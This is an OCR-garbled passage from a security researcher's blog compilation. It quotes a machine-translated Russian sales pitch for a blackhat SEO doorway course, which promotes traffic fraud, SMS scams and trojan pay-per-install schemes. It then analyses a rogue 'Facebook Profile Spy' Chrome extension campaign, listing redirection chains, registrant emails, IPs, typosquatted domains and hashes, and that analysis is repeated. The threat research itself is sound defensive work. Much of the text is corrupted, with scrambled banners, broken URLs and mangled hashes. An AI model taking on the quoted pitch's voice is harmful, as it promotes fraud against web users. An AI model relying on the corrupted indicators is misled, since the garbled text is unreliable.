ately makes the doorways correctly. Once again, we are waiting for our club anonymous 
millionaires of people who know the value of money and his own time, who want to invest in 
yourself, earn, and not break your head against the wall, when there are people who will show 
how to get around. 


Course can be purchased on the preliminary interview in ICQ price - $ 1000. 


And remember, we are, we need special people, very few of them, they are people who 
are willing to invest in yourself and do not try to save yourself cheaply though. So | throw 
in ICQ to ignore anyone who asks me for a discount or credit. | understand that in spite of 
the 80-page review, you may be unsure if it will work with you. Therefore, we give a new 
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guarantee manibeka. If two weeks you feel - that doorway - it’s not yours, we will refund the 
money and pay the top 5 million rubles, for what you have spent your time! 


Frequently Asked Questions (FAQ) 


Good day, and now its time to answer all the questions a novice who wants to buy a 
course to dot the i, made to understand that he buys, he will get what may dobitsya.Nus’s 
begin. 


1.Chem we do? 


Black seo.Dorvei.Dory are very flexible and tenacious tool for earnings, its flexibility due 
to the variety of topics and types of monetization, and vitality - the existence of PS, and how 
long will exist as long as the search engines will be using dory. We produce traffic, ie the 
users, ie the people, the traffic is the blood in the veins of the internet, and this is the main 
advantage that dorveyschik unlike white SEOs can in a short time to break a lot more traffa a 
completely different subjects and to merge it back where it needs. in a simple version of all 
is: 

1.Registriruemsya an affiliate program, it gives you the choice of partner sites of some topics 
(topics vary from porn and finishing all kinds of divination), statistics (to track kollvo coming 
to your site, paid for kollvo, Colva who have come again). 

2.Delaem doorway, we find: 

- Thematic traffistye quality keys (which are appropriate to the site subject we took from PP) 

- Template 

- Text 

All this is described in detail in the course and on the forum. 

3.Zalivaem doorway to shell 

4,Zhdem 4.3 apa (an - update Yandex search results, also known as SERP, quite by chance, 
usually up to one week, sometimes more) 

5.Poluchaem traff and accordingly money. 

Well this is just a simple and obvious option, work with SMS affiliate, to start - the fact that 
many small minded people to talk about the thousandth time of death doorways as income, 
just because of the changes in the SMS payment, it’s wrong, it’s stupid, it’s self-deception to 
deceive drugih.I as, say, we have learned to produce traffic, our traffic started to give Dora 
and now we have to redirect it somewhere ie merge and convert / convert into money, a lot 
of options: 

1.Partnerki with sms payment, the most obvious and as | wrote the best option to start. 
2.Partnerki pay-per-download and install the file, such PP a lot, and they are all different, from 
the fact that you are paying for the jump and the malicious Trojan or whether something like 
that, to quite formal type of games WORLD of-tanks, Yandex bars etc. and tp.lmeya large 
amounts of traffic (which is the second task dorveyschika, increase the volume of traffic) in 
the first and in the second option holders PP will take you with open arms and make bonuses. 
3.Svoi online shopping and platniki.V this topic a little feedback from these guys, as many 
prefer to work with SMS and other PP, but byvali.Odin met some of the students at comrade 
serche, he did an Internet jewelry store and the problem was my student in the production of 
traffic, he quickly picked up, done and grabbed a piece of the profit. 

All that | wrote just for you to understand, | teach mine traffic, targeted traffic from search 
engines, | would suggest the best methods of monetization, by which usually fight off the 
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course, but never forget that you have a great opportunity to go and grab a piece of the traffa 
on desired topics with Yandex and merge where necessary. 


2.Navernoe topic died, bought her so much, so long existed, much is competi- 
tion? 


! am for all the time of sale of the course has experienced the death of a thousand and 
one as the reward scheme, but that’s amazing, for some reason all those who want to - 
successfully earn dorah.Chto for competition - in dorah very high turnover, namely Dora 
always fly into the index ( Yandex search) and flew over, it’s all backed by the characteristic 
features of the behavior dorveyschika and dorveyschik often tasting dough, he realized how 
easily make dory, does pack and walk yourself getting denyuzhki, leaving room for other 
results. 


3.Zachem you sell? 


That’s what | do - called infobiznesom admit, when all this started, | such a word and 
znal.Est two concepts, with which you can ever accurately explain the infobiznesa, informa- 
tion and insider information autsayder.Kogda-long ago, when | was dramas and gathering 
information about them bit by bit on various forums - | was an outsider, | was not available 
methods that can quickly lead to success, and everything had to be found by experiment, my 
first income from went after 3 months and a naked enthusiasm nadezhdy.Pokupaya course 
you get insider information, which is called the bat, straight to the kitchen where everything 
is cooked, | do not sell super flow sheet, | only give an opportunity and take it for a fee, sell 
their time and, in recent years, more and more nerves, which is why, in order to maintain this 
non-renewable resource, and | wrote it, do not be lazy, read. 


4.Kak guarantee that | Otobaya course? 


No! Absolutely! Absolutely no, When we first started selling rate - while | was still able 
to provide guarantees to score reviews, to prove to everyone that the theme works, but now 
- no, no way! Your warranty - you, your desire, hard work , commitment - that guarantee 
it, | can not guarantee anything | can not and will not, often when a person writes me word 
guarantee, he wants me to take responsibility for his lazy ass over - No, I’m sorry. 


5.Malenky advice, how to effectively master the course and see if it fits you 
at all. 


My experience learning heaps different people, still divided them into two types, this is 
a huge difference, the gap between the two approaches to learning, results in a huge gap in 
the success of these students. 

The first type: people with pure slave mentality, they need to stick, do not explain, do not 
need to seek understanding, just poke, push there, click here. 

How he thinks: Suppose we make a template for Dora, and we need to write deksripshen, 
deskripshen - description of the site which comes out at the bottom under the link, his task - 
to give information about the page and encourage people to move to tyknut ie sayt.On asks 
me what write here, | explain what it is and 1 say write something that would please you, and 
you would make pereyti.On in a stupor, he can not think and can not even offer the option, he 
just wants me to tell him that there napisat.Eto not right! 

The second type: The second type is often trying to organize all the information in the first 
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place to understand how things work, and there are already having a solid foundation and 
framework - to batter me with questions and to increase their knowledge, for example of the 
first type, the second type, after hearing deskripshen what and why it is, would compare with 
my examples and offered his variant.Vot so you have to be, if you’re so - I'll be glad to have 
you in the ranks of students. 


6.Tsena huge! Tc asshole, the course did not buy, but it’s an asshole! Reviews 
delete it! 


Do not like the price - do not buy it, no one vparivaet, there is no hint of the imposition 
of the course, under the gun more so no one makes pokupat.Golye hit and conclusions about 
the course of those who did not buy it - please do not post, | immediately call the moderators, 
all is removed, how can you talk about the course, not having been on FSU How we can 
talk about what you do not know, if you were not in the motivation section on the forum 
where dozens of success stories of students? | bought the course, learned, wrote otzyv.Ya a 
moderator section only CEO and section on "Work" where this topic - | can not moderate. 


7.What I receive after payment? 


Education - after payment receive video / txt + access to the forum, watch / read / do, 
have questions - ask, discuss - send to the forum, no - rasskazyvayu.Esli you read the topic 
that many people write that the chip in the forum, unnecessarily there is a lot of relevant info 
and all you happy pomoch.Ves free software data - paid counterparts shown in forume.Dostup 
forum and consultations Asik - unlimited. 


8.Skolko need to successfully quick Start? 


Then (in a week or another) will need $ 10-20 for vpn (both analog proxy / socks or 
Dedicated Server) and 200-300 rubles for glanders. 


9.Kak Otobaya fast I / osvoyu course? 


Everything is individual, calculate and even about to say (to you) this time period may 
depend both on the human factor (your knowledge, experience) and on Yandex, which is quite 
nepredskazuem.Osnovyvayas on the experience of previous students gives dor $ 200 4 up to 
30 days after the publication of indeks.3-4 apa usually climbs Dor ups are completely random, 
look here http://seobudget.ru/updates labeled SERP. 


10.Rynok forum. 


In our forum, which you can access after purchase - there is a market, as in any other 
forum, it is an integral part of the forum who wants to live, and in the end we are all in this 
forum for one reason - we all want to make money someone else has earned, someone just 
nachinaet.V Unlike other forums - the market for FSU controlling me, he monopolizirovan. 
Kursy of its kind in the forum -! only sell and no other, their commercial activities in the forum 
- with me coordinate is not necessary, but if it is removed - so she does not belong here. 


Screenshots provided by actual customers of the service, featuring its primary ICQ con- 
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Blackhat SEO - it doesn’t just pay the bills. 


Updates will be posted as soon as new developments take place. 


. http: //www.av-test.org/fileadmin/pdf/avtest_2013-03_search_engines_malware_english. pdf 
. http: //ddanchev. blogspot .com/2010/07/sampling-malicious-activity-inside.html 
. http: //www.zdnet .com/blog/security/cybercriminals-promoting-malware-friendly-search-engines/3333 


. http: //www.zdnet .com/blog/security/botnets-committing-click-fraud-observed/1200 


UF WN FH 


. https: //www.google.com/#output=search&sclient=psy-ab&q=site:ddanchev.blogspot.com+/22blackhatt+seo/22koq=si 
te:ddanchev. blogspot .com+/,22blackhat+seo/22&gs_1= 

6. http: //ddanchev. blogspot .com/2009/06/peek- inside-managed-blackhat-seo.html 

7. https://www.google.com/#output=search&sclient=psy-ab&q=site:ddanchev.blogspot .com+blackhat+seo 


4224 


9.5 May 


9.5.1 Summarizing Webroot’s Threat Blog Posts for April (2013-05-01 14:32) 


threat blog 


Products Support Communty& Resouces Partners About Webroot About the Gtoggers 


Fake Microsoft Security Scam search 


Posted on Apel 0, 201 


ee _ STOP THE GUESSWORK - 
SecureAnywhere 
User Protection 


Recently we have seen an increase in fake Microsoft scams, whech function by triciong peopie into thiniong that ther PC is 
infeciod. Wath those types of scams there are a number of things to remember 


1. Microsoft will never call you telling you that your PC is infected 

2. Never allow strangers to connect to your PC 

3. Donot give any credit card info to somebody claiming to be from Microsoft 
4 if in doubt, shut down your PC and call Webroot 


E ICONSE Protects. 


umtO FOUR devices 


LEARN MORE » 
The current scam will display a wobpage that & wery saméar to the one in Figure 1. There are a number of ways to figure 
out that this is @ false alert, The first ts that i's 4 website message and not 4 program, the second ss that location of the 
web sie wil be a fandom sining of letters 


WEB THREAT REPORT: 


More detats Continue reading - 


Tell yout treads: Hj Facerose ( twee Googe+t [Gj unkeae ch Reose (Ei imat |p) wore IS YOUR COMPANY EXPOSED? 


Get a complimentary copy of a new 
Survey, and learn about the latest 
Wed-torne Preats, echideg thee 
costs and enpacts 


Posted in Advances Matware Removal. malware, Roque Secunty Products. soda engineering, Threat Research | Tagged fakeaien, Maboous Sofware DOWNLOAD THE STUDY NOW » 
Wbcres.o8 Stouty Scam. toque antvirvs | Leave a comment 


(ike thes 


The following is a brief summary of all of my posts at Webroot’s Threat Blog for April, 2013. 
You can subscribe to [1]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


x 


01. [2]DIY Java-based RAT (Remote Access Tool) spotted in the wild 

02. [3]Spamvertised ‘Re: Changelog as promised’ themed emails lead to malware 

03. [4]Cybercrime-friendly service offers access to tens of thousands of compromised ac- 
counts 

04. [5]Madi/Mahdi/Flashback OS X connected malware spreading through Skype 

05. [6]Cybercriminals selling valid ‘business card’ data of company executives across multiple 
verticals 

06. [7]A peek inside the ‘Zerokit/Okit/ringO bundle’ bootkit 

07. [8]DIY Skype ring flooder offered for sale 

08. [9]Spamvertised ‘Your order for helicopter for the weekend’ themed emails lead to 
malware 

09. [10]A peek inside a ‘life cycle aware’ underground market ad for a private keylogger 

10. [11]American Airlines ‘You can download your ticket’ themed emails lead to malware 

11. [12]Cybercriminals offer soam-friendly SMTP servers for rent 
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12. [13]How mobile spammers verify the validity of harvested phone numbers - part two 

13. [14]A peek inside a (cracked) commercially available RAT (Remote Access Tool) 

14. [15]DIY Russian mobile number harvesting tool spotted in the wild 

15. [16]DIY SIP-based TDoS tool/number validity checker offered for sale 

16. [17]CAPTCHA-solving Russian email account registration tool helps facilitate cybercrime 
17. [18]Historical OSINT - The ‘Boston Marathon explosion’ and ‘Fertilizer plant explosion in 
Texas’ themed malware campaigns 

18. [19]Fake ‘DHL Delivery Report’ themed emails lead to malware 

19. [20]Cybercriminals impersonate Bank of America (BofA), serve malware 

20. [21]How fraudulent blackhat SEO monetizers apply Quality Assurance (QA) to their DIY 
doorway generators 

21. [22]Managed ‘Russian ransomware’ as a Service spotted in the wild 


This post has been reproduced from [23]Dancho Danchev’s blog. Follow him 
[24]on Twitter. 


1. http: //feeds2.feedburner .com/WebrootThreatBlog 


ttp://blog.webroot .com/2013/04/01/diy- java-based-rat-remote-access-tool-spotted-in-the-wild/ 


across-multiple-verticals/ 


7. http: //blog. webroot .com/2013/04/08/a-peek- inside-the-zerokit0kitring0-bundle-bootkit/ 


8. http: //blog. webroot .com/2013/04/09/diy-skype-ring-flooder-offered-for-sale/ 


9. http://blog.webroot.com/2013/04/10/spamvertised-your-order-for-helicopter-for-the-weekend-themed-emails- 


ead-to-malware/ 


10. http://blog.webroot .com/2013/04/11/a-peek-inside-a-life-cycle-aware-underground-market-ad-for-a-private 


keylogger/ 


11. bttp://blog.webroot .com/2013/04/12/american-airlines-you-can-download-your-ticket-themed-emails-lead-to 


12. http://blog.webroot .com/2013/04/15/cybercriminals-offer-spam-friendly-smtp-servers-for-rent/ 


13. http://blog.webroot .com/2013/04/16/how-mobile-spammers-verify-the-validity-of-harvested-phone-numbers- 


14. bttp://blog.webroot .com/2013/04/17/a-peek- inside-a-cracked-commercially-available-rat-remote-access-too 
15. http: //blog. webroot. com/2013/04/18/diy-russian-mobile-number-harvesting-tool-spotted-in-the-wild/ 
16. http: //blog. webroot .com/2013/04/19/diy-sip-based-tdos-toolnumber-validity-checker-offered-for-sale/ 


17. hbttp://blog. webroot .com/2013/04/23/captcha-solving-russian-email-account-registration-tool-helps-facili 


ate-cybercrime/ 


18. http://blog.webroot .com/2013/04/24/historical-osint-the-boston-marathon-explosion-and-fertilizer-plant- 


explosion-in-texas-themed-malware-campaigns/ 
19. http://blog. webroot .com/2013/04/25/fake-dhl-delivery-report-themed-emails-lead-to-malware/ 
20. http: //blog. webroot. com/2013/04/26/cybercriminals- impersonate-bank- of-america-bofa-serve-malware/ 


21. http://blog.webroot .com/2013/04/29/how-fraudulent-blackhat-seo-monetizers-apply-quality-assurance-qa-to 


their-diy-doorway-generators/ 


22. http://blog. webroot. com/2013/04/30/managed-russian-ransomware-as-a-service-spotted-in-the-wild/ 
23. http://ddanchev.blogspot.com/ 
24. bttp://twitter.com/danchodanche 
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9.5.2 Fake ’Facebook Profile Spy Application’ Campaign Spreading Across Facebook 
(2013-05-24 18:58) 
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Over the last couple of days, multi-tasking cybercriminals have been spreading a "Facebook 
Profile Soy" campaign across Facebook, enticing users into installing a rogue Chrome exten- 
sion, next to monetizing the campaign through an unethical pseudo-mobile marketing agency, 
known as Prizerally. 


Sample redirection chain: 

hxxps://www.facebook.com/pages/HajmcI1 rnjr/1 72683159561584?sk=app 
_190322544333196 &9DyG45 -> hxxp://horribleapps.com -> hxxp://terribleapps.com_ - 
>  hxxps://chrome.google.com/webstore/detail/oacggeibdmjpmecojanibbngabki ncif = -> 
hxxp://www. picapplication.com/profile/last.html?1 -> hxxp://flightdealsrome.net/?subid=4563 
-> hxxp://lp.prizerally.com 
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facebook 
profile spy“ 


Now you can see who has 
ss E Elizabeth Perkins checked out your profile 
been looking at your profile Ng | 


Detected on: Today, 7:00pm 


and pictures on Facebook! jaune Wapers Cached oun your plcners 


Notifications 


settings 


Detected on: Today, 7:00pm 
Get instant notifications when someone 
is looking at your profile page on the 
world's most popular social network. 


Molly Fitzgerald checked out your profile 


16 minutes ago 


Rachel Snow checked out your profile 


18 minutes ago 


ADD TO CHROME — 


Domain names reconnaissance: 

horribleapps.com - 66.150.99.179 (picovator.com) - Email: Masterjx12@gmail.com 
terribleapps.com - 66.150.99.21 (puzzledapps.com; testyapps.com) - Email: 
terjx12@gmail.com 

picapplication.com - 66.150.99.179 - Email: joshuarhodes1989@gmail.com 
flightdealsrome.net - 174.140.17.100 

prizerally.com - 46.19.35.207 - Email: domains@mypengomobile.com 


Mas- 


We also got the following fraudulent and typosqutted domains known to have responded to 


the same IP (174.140.17.100) in the past: 
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0418490819.com 
20.tv 
2020testing.net 
aaacomtests.net 
aaacontests.net 
aaamathtests.net 
accordput.net 
aceonlinetest.com 
activetester.com 
adjustfit.net 
adjustpair.net 
adjusttie.net 
adslim.com 
adventuretester.com 
aidonlinesurveys.com 
airplanetester.com 
alignhang.net 
alignmake.net 
aliketester.com 
allosurvey.net 
amatuercumshots.org 
analyzequiz.net 
animalplanet.net 
animereak.tv 


answeringonlinesurveys.com 


apptitudeonlinetest.com 
arcosurvey.net 
attuneeven.net 
attunefix.net 
attunehang.net 
attunemake.net 
attunepair.net 
attunetune.net 
avizoon.com 
azdes.org 
bajarvideo.com 
balanceattune.net 
balancecollate.net 
balanceconnect.net 
balancecounteract.net 
balanceeven-steven.net 
balancefocus.net 
balancelevel.net 
balanceneutralize.net 
balancenullify.net 
balanceoverhaul.net 
balancerectify.net 
balancesymmetry.net 
balancetighten.net 
bargainonlinetest.com 
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bensurvey.net 
bestgetpaidonlinesurveys.com 
bestonlinesurveysformoney.com 
bestonlinesurveysforpay.com 
bestonlinesurveyswebsite.com 
bestprizedraw.com 
bestratedonlinesurveys.com 
bestwebquiz.net 
bigpaidonlinesurveys.com 
bitsonlinetest.com 
blackgaygalleries.com 
bletsurvey.net 
blosurvey.net 

bobmarly.com 
bollywoodringtonessite.com 
bret.com 

bringgrind.net 

bringtie.net 

builbabear.com 
buildonlinesurveys.com 
cancelfix.net 
cansafelist.com 
carquestionswebsite.com 
censurvey.net 
challengequizonline.net 
cheaponlinetests.com 
chinabestlink.com 
clickbusinessinfo.net 
coinsurvey.net 
collegeonlinetests.com 
commercenetweb.com 
compeitionstowinprizes.com 
coolfreequizzes.com 
cooponmom.net 
countest.net 

couponso.net 
crazyonlinequizzes.com 
creativelinkusa.com 
cuteonlinequizzes.com 
descargapeliculas.com 
dfedex.com 
didiwinaprize.net 
discountonlinetests.com 
dogquizzes.net 
dotnetlink.com 
downloadsmovies.com 
easyonlinetesting.com 
eicosurvey.net 
employersonlinetest.com 
englishonlinetest.com 


4230 


etestonlinetesting.com 
examxonlinetesting.com 
exposurvey.net 
farbestsurvey.net 
fastrackonlinesurveys.com 
fastsurveyworld.net 
fbso.com 
findonlinesurveysforcash.com 
fletsurvey.net 
fnnyvideo.com 
fontest.net 
free-live-xxx-cams.com 
friendsonlinequiz.com 
fuck-me-now.com 
funonlinequizsurvey.com 
funonlinequizteen.com 
funonlinequizzesforkids.com 
gay-sex-pics-porn-pictures-gay-sex-porn-gay-Sex-pics-gay.com 
generalonlinequiz.com 
generatest.net 
geocites.com 
getpageranks.com 
googledark.com 
googlemx.com 
googletraductor.com 
googleunclesam.com 
googllemaps.com 
gooyoutube.com 
granny.ca 

gsd.com 

gyoutube.com 
hack-facebook.com 
hkatb.adsldns.org 
hohotmail.com 

holderme 
holidaytravelpassport.net 
hotmailm.com 
hotmauil.com 
hpforsale.org 
internet-questions.net 
ioutube.com 

jkert.com 

joinsurvey.net 
kemert.com 
kerosurvey.net 
kogregate.com 
kurosurvey.net 
landminesurvey.net 
latinswomen.com 
letsurvey.net 
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lolita.org 
loveonlinequiz.com 
marilyn.com 
medialinksite.com 
mensurvey.net 
mfacebook.com 
miniclip.cl 

minsurvey.net 
mobiasbank.com 
monicatubes.com 
movietickits.com 
msdip.com 
mycosurvey.net 
myford.com 
notyoutube.com 
ohotmail.com 

oijwef.com 
onlinemedsforall.net.in 
onlinequizze.com 
outsurvey.net 
pharmaonline.net.in 
pina.com 

pollings.net 

pollinois.net 
pollinoise.net 

pollison.net 

pollist.net 

pollower.net 
pollquestionsitewhdh.com 
pollustry.net 

pollutan.net 
poutsurvey.net 
question-answer-website.com 
questionansweringwebsites.com 
questionanswerstudy.net 
questionexams.net 
questionforthequiz.com 
questionnairesamplesurvey.com 
questionpersonalityquiz.net 
questionpollguide.net 
questionquizsite.net 
questionquizworld.net 
questionsforasurvey.com 
questionsitesell.com 
questionssurveys.com 
questionsurveyfriend.com 
quicksurveydirect.net 
quizbull.net 

quizbulla.net 
quizbullah.net 
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quizbullen.net 
guizbulles.net 
guizbust.net 
quizbustav.net 
guizbustin.net 
quizbustle.net 
quizbustom.net 
quizbustry.net 
quizin.net 
quizingles.net 
quizingly.net 
quizquestionsite.net 
quizzeri.net 
quizzerial.net 
quizzeris.net 
guizzerish.net 
redirectofferpage.com 
reinsurvey.net 
rentube.com 
rep.ppmate.com 
repeatest.net 
ruralaresdubai.net.in 
sappygirls.com 
scensurvey.net 
securitytube.com 
seehomevids.com 
stratest.net 
sumotorrents.com 
sunsurvey.net 
superquestionquiz.net 
supersurveygroup.net 
supersurveysite.net 
survey-masters.net 
2surveyablsoute.net 
surveyaboutyou.net 
surveyacout.net 
surveyalot.net 
surveyanyone.net 
surveyask.net 
surveyassistant.net 
surveylatest.net 
surveyorster.net 
susan.com 
testabled.net 
testables.net 
testabling.net 
testand.net 
testants.net 
testatus.net 
testaura.net 
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testaustralia.com 
testeradjective.com 
testeradvice.com 
testeraid.com 
testic.net 
testical.net 
testige.net 
testigious.net 
testingacacdemy.net 
testingadvantage.net 
testingadvice.net 
testingadwords.net 
testingagainagain.net 
testingame.net 
testion.net 
testivate.net 
testself.net 
tetsurvey.net 
thegreatanswer.com 
thenamequiz.net 
thequestionpoll.net 
thesurveyresearch.net 
thosurvey.net 
tmobilw.com 
toutsurvey.net 
toyotest.net 
tsurvey.net 
tube99.com 
tunehang.net 
tunelevel.net 
tunemake.net 
tuneoppose.net 
tuneparity.net 
tuneservice.net 
tuneset.net 
tunesteady.net 
tunetie.net 
twittee.com 
unionbank.org 
unsurvey.net 
update.ppmate.com 
usagreatlink.com 
vacationcellular.net 
vintagetownbazar.co.in 
watchyoutube.com 
webwordquiz.net 
weighfit.net 
weighmake.net 
weighmend.net 
weighparity.net 
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weighpolish.net 
weightighten.net 
wesurvey.net 
wickapidea.com 
wickepidia.com 
worldcityonline.com 
wuizforcash.com 
www-yuotube.com 
www.ammoneta.com 
www.downloadsmovies.com 
www.foxchannel.com 
www.hack-facebook.com 
www.securitytube.com 
www.tmobilw.com 
www.windycitywatchdog.com 
www.youtrube.com 
www.youtubemobile.com 
www.youtuve.com 
wwwquestionnairesurveys.com 
wwwtoutube.com 
yahoomailk.com 
yaotube.com 
yautube.com 
yootube.com 
yotobe.com 
youbube.com 
yourhomesurvey.net 
yourownsurvey.net 
yoursurveysite.net 
yourtopsite.com 
youtsurvey.net 
youtubemobile.com 
youtubi.com 
youtuhe.com 
youtuve.com 
ypoutube.com 
yuvuty.com 
zerosurvey.net 


4235 


Thank You 


May 24, 2013 


As well as the following malicious MD5s phoning back to the same IP in the past: 
[1]MD5: €315a877C58773ce82cc32fc192bdfa5 

[2]MD5: 1¢cd4c2a2b2143689b185e064dc6c331c 

[3]MD5: 26c5102e75daf3d3c696ad719bc55ad4 


IZE 
RALLY 


Select your country || 


Welcome to Prizerally! 


Prizerally is is the new innovative mobilecontent brand where you can play sticky skill based quizzes and have a chance to win amazing prizes! 
Varying from Iphones to Ipads. Prizerally offers prizes everybody likes! 


With its carefully selected questions, Prizerally makes sure you are challenged every week with up to date questions varying between 
different categories and different levels of difficulty. 


Don't miss out and make sure you take on the challenge! 
Prizerally 


Prizerally’s scheme is fairly simple: 
Service costs £3 per question played and a £4,50 sign up fee applies. You will receive an 
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additional £1.50 charge for a reminder message tomorrow. Winners will be contacted every 
first businessweek of the month, all question entries must be received before 00.00 on the 
last day of the month. This is not a subscription service. Minimum age 18+ with bill payer’s 
permission. One prize available per service per month. Customer service: call 0800 408 0796, 
email uk@prizerally.com or visit the website: www.prizerally.com. Play the game on your 
mobile. The winner will be selected among all participants in the first business week of every 
month. When participating you acknowledge that you agree to the terms & conditions, you are 
a resident of the UK, 18 years or older and authorized account holder and/or that you have the 
consent of the accountholder. £3 per question. This service is a product of Mypengo Mobile. 
Free entry method: send an email with your name, phonenumber, and prize you want to win 
to info@prizerally.com. Prizerally is not affiliated with, sponsored by or endorsed by any of the 
listed products or retailers. Trademarks, service marks, logos (including, without limitation, 
the individual names of products and retailers) are the property of their respective owners. 
When you see one of our Products on the Internet, you can start receiving our content via 
SMS (i.e. text message). You can enter your mobile telephone number on the landing pages 
via the Internet and confirm your registration. You hereby agree to the Terms and Conditions. 
Prizerally charges you £3,00 per question played. Each sent answer will be followed by a new 
question. If you stop sending answers you will not receive any more messages. Once stopped 
you will receive one extra £1,50 reminder message. To stop this message, simply text STOP 
to 85150. From this moment on you have to decide on your own if you will continue to play 
for more points. By answering a question, you will receive a new messages containing a new 
puzzel/question also chargeble at £ 1,50 per text message received. When you stop sending 
answers the game will end. O2 and Orange customers can only spend the maximum amount 
of £ 30.00 a day. This spending cap applies for one day, so the next day these customers are 
eligble to play again. The maximum amount you can spend on our Prizerally service is £ 99.00. 


Facebook has been notified. The rogue Chrome extension has already been removed. 


This post has been reproduced from [4]Dancho Danchev’s blog. Follow him 
[5]Jon Twitter. 


1. https://www.virustotal .com/en/file/0329bd90de1ad1608bf e91210b66929caeb99a0574bb1008123b95c7b1b0e756/analys 


ttp://ddanchev. blogspot .com/ 


ttp://twitter.com/danchodanche 


9.5.3 Fake ’Facebook Profile Spy Application’ Campaign Spreading Across Facebook 
(2013-05-24 18:58) 
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Over the last couple of days, multi-tasking cybercriminals have been spreading a "Face- 
book Profile Spy" campaign across Facebook, enticing users into installing a rogue Chrome 
extension, next to monetizing the campaign through an unethical pseudo-mobile marketing 
agency, known as Prizerally. 


Sample redirection chain: 


hxxps://www. facebook.com/pages/Hajmc1 rnjr/1 72683159561584?sk=app 
_190322544333196 &9DyG45 -> hxxp://horribleapps.com -> hxxp://terribleapps.com_ - 
>  hxxps://chrome.google.com/webstore/detail/oacggeibdmjpmecojanlbbngabki ncif -> 
hxxp://www.picapplication.com/profile/last.html?1 -> hxxp://flightdealsrome.net/?subid=4563 
-> hxxp://Ip.prizerally.com 
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facebook 
profile spy’ 


Now you can see who has — 
been looking at your profile Ng | finan ktiaiieiaeiaas 
and pictures on Facebook! hah thiaiiah taaraed ane ae 


Detected on: Today, 7:00pm 


settings 


Get instant notifications when someone 
is looking at your profile page on the 
world's most popular social network. 


Molly Fitzgerald checked out your profile 


16 minutes ago 


Rachel Snow checked out your profile 


18 minutes ago 


ADD IO GHRUME —— 


Domain names reconnaissance: 
horribleapps.com - 66.150.99.179 (picovator.com) - Email: Masterjx12@gmail.com 


terribleapps.com - 66.150.99.21 (puzzledapps.com; testyapps.com) - Email: 
terjx12@gmail.com 


picapplication.com - 66.150.99.179 - Email: joshuarhodes1989@gmail.com 
flightdealsrome.net - 174.140.17.100 


prizerally.com - 46.19.35.207 - Email: domains@mypengomobile.com 


Mas- 
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We also got the following fraudulent and typosqutted domains known to have responded to 
the same IP (174.140.17.100) in the past: 


0418490819.com 
20.tv 
2020testing.net 
aaacomtests.net 
aaacontests.net 
aaamathtests.net 
accordput.net 
aceonlinetest.com 
activetestercom 
adjustfit.net 
adjustpair.net 
adjusttie.net 
adslim.com 
adventuretester.com 
aidonlinesurveys.com 
airplanetester.com 
alignhang.net 
alignmake.net 
aliketester.com 
allosurvey.net 
amatuercumshots.org 
analyzequiz.net 
animalplanet.net 
animereak.tv 
answeringonlinesurveys.com 
apptitudeonlinetest.com 
arcosurvey.net 
attuneeven.net 
attunefix.net 
attunehang.net 
attunemake.net 
attunepair.net 
attunetune.net 
avizoon.com 
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azdes.org 

bajarvideo.com 
balanceattune.net 
balancecollate.net 
balanceconnect.net 
balancecounteract.net 
balanceeven-steven.net 
balancefocus.net 
balancelevel.net 
balanceneutralize.net 
balancenullify.net 
balanceoverhaul.net 
balancerectify.net 
balancesymmetry.net 
balancetighten.net 
bargainonlinetest.com 
bensurvey.net 
bestgetpaidonlinesurveys.com 
bestonlinesurveysformoney.com 
bestonlinesurveysforpay.com 
bestonlinesurveyswebsite.com 
bestprizedraw.com 
bestratedonlinesurveys.com 
bestwebquiz.net 
bigpaidonlinesurveys.com 
bitsonlinetest.com 
blackgaygalleries.com 
bletsurvey.net 
blosurvey.net 

bobmarly.com 
bollywoodringtonessite.com 
bret.com 

bringgrind.net 

bringtie.net 

builbabear.com 
buildonlinesurveys.com 
cancelfix.net 
cansafelist.com 
carquestionswebsite.com 
censurvey.net 
challengequizonline.net 
cheaponlinetests.com 
chinabestlink.com 
clickbusinessinfo.net 
coinsurvey.net 
collegeonlinetests.com 
commercenetweb.com 
compeitionstowinprizes.com 
coolfreequizzes.com 
cooponmom.net 
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countest.net 
couponso.net 
crazyonlinequizzes.com 
creativelinkusa.com 
cuteonlinequizzes.com 
descargapeliculas.com 
dfedex.com 
didiwinaprize.net 
discountonlinetests.com 
dogquizzes.net 
dotnetlink.com 
downloadsmovies.com 
easyonlinetesting.com 
eicosurvey.net 
employersonlinetest.com 
englishonlinetest.com 
etestonlinetesting.com 
examxonlinetesting.com 
exposurvey.net 
farbestsurvey.net 
fastrackonlinesurveys.com 
fastsurveyworld.net 
fbso.com 
findonlinesurveysforcash.com 
fletsurvey.net 
fnnyvideo.com 
fontest.net 
free-live-xxx-cams.com 
friendsonlinequiz.com 
fuck-me-now.com 
funonlinequizsurvey.com 
funonlinequizteen.com 
funonlinequizzesforkids.com 
gay-sex-pics-porn-pictures-gay-sex-porn-gay-Sex-pics-gay.com 
generalonlinequiz.com 
generatest.net 
geocites.com 
getpageranks.com 
googledark.com 
googlemx.com 
googletraductor.com 
googleunclesam.com 
googllemaps.com 
gooyoutube.com 
granny.ca 

gsd.com 

gyoutube.com 
hack-facebook.com 
hkatb.adsldns.org 
hohotmail.com 
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holder.me 
holidaytravelpassport.net 
hotmailm.com 
hotmauil.com 
hpforsale.org 
internet-questions.net 
ioutube.com 

jkert.com 
joinsurvey.net 
kemert.com 
kerosurvey.net 
kogregate.com 
kurosurvey.net 
landminesurvey.net 
latinswomen.com 
letsurvey.net 

lolita.org 
loveonlinequiz.com 
marilyn.com 
medialinksite.com 
mensurvey.net 
mfacebook.com 
miniclip.cl 
minsurvey.net 
mobiasbank.com 
monicatubes.com 
movietickits.com 
msdip.com 
mycosurvey.net 
myford.com 
notyoutube.com 
ohotmail.com 
oijwef.com 
onlinemedsforall.net.in 
onlinequizze.com 
outsurvey.net 
pharmaonline.net.in 
pina.com 

pollings.net 
pollinois.net 
pollinoise.net 
pollison.net 

pollist.net 
pollower.net 
pollquestionsitewhdh.com 
pollustry.net 
pollutan.net 
poutsurvey.net 
question-answer-website.com 
questionansweringwebsites.com 
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questionanswerstudy.net 
questionexams.net 
questionforthequiz.com 
questionnairesamplesurvey.com 
questionpersonalityquiz.net 
questionpollguide.net 
questionquizsite.net 
questionquizworld.net 
questionsforasurvey.com 
questionsitesell.com 
questionssurveys.com 
questionsurveyfriend.com 
quicksurveydirect.net 
quizbull.net 
quizbulla.net 
quizbullah.net 
quizbullen.net 
quizbulles.net 
quizbust.net 
quizbustav.net 
quizbustin.net 
quizbustle.net 
quizbustom.net 
quizbustry.net 

guizin.net 

guizingles.net 
quizingly.net 
quizquestionsite.net 
quizzeri.net 
quizzerial.net 
quizzeris.net 
quizzerish.net 
